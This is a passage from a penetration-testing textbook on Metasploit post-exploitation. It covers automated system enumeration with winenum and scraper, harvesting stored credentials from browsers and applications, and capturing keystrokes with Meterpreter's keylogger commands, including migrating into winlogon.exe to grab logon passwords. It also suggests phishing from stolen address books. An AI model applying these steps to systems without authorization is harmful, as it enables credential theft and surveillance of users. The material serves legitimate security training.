Ethical Hacking and Penetration Testing Guide
Yüklə 22,44 Mb. Pdf görüntüsü
|
- Bu səhifədəki naviqasiya:
- Gathering OS Information
- Harvesting Stored Credentials
|
Gathering OS Information
In the situation awareness phase, we used multiple OS commands to gather data such as the IP addresses, the arp table, the routing table, and services. Running these commands manually could be very time consuming. In meterpreter, we have two scripts, namely, “winenum” and “scraper”, that can automate the process of situation awareness. These scripts work by running a number of os commands; let’s try the winenum command first: meterpreter> run winenum As you can see from the screenshot, the output runs several Windows shell commands such as netstat –ns, net accounts, and net start. The outputs of these commands are saved into separate text files in the /root/.msf4/logs/scripts/winenum directory. Postexploitation ◾ 261 The combination of the winenum and scraper is very fruitful, since scraper can also be used to find the same level of information, but it goes one step further and also harvests other interesting information such as dumping hashes and the entire registry. We can use the “ run scrapper ” command from meterpreter to execute meterpreter. The output is stored in the /root/.msf4/logs/ scripts/scraper directory. Harvesting Stored Credentials Browser history can contain interesting data such as the websites visited and stored passwords. Stored passwords can allow you to gain further access to a company’s emails, personal emails, and so on, which could contain sensitive information as well. Once you have access to the e-mail you can download the address book and perform client side attacks, such as phishing, to further compromise other e-mails accounts. Metasploit has tons of different scripts for this purpose; the scripts can be found in the post/ windows/gather/credentials directory. The scripts can harvest credentials from different softwares such as FileZilla and Outlook. If passwords are not stored inside the browser or any other application, we can use an alternative approach, which involves using a keylogger. A keylogger is a program that captures every keystroke performed by the victim. Meterpreter has a built-in script that can help us accomplish this task. We have to start the keylogger on the victim’s machine and wait until the victim logs in to a website or any other application. To start the keylogger, just run the follow- ing command: meterpreter>keyscan_start 262 ◾ Ethical Hacking and Penetration Testing Guide Now to check if our keylogger has captured any of the passwords, we will use the following command. meterpreter> keyscan_dump Note : Make sure that you have migrated to explorer.exe before running the script. In this case, it has not captured any of the keystrokes yet; as soon as the victim starts typing, we will see the keystrokes on our screen. If we want to capture the credentials of all users logging in to the machine, we simply need to migrate the process to winlogon.exe and start the keylogger again. Alternatively, we have a better meterpreter script called “keylogrecorder”. This script will automatically save the recorded keystrokes inside the database. The script can be executed by using the following command: meterpreter>run keylogrecorder By default it would automatically migrate to the explorer.exe process and try to capture key- strokes. If you would like to record the Windows logon credentials, you would need to specify an additional parameter –c followed by “1”. Yüklə 22,44 Mb. Dostları ilə paylaş:
|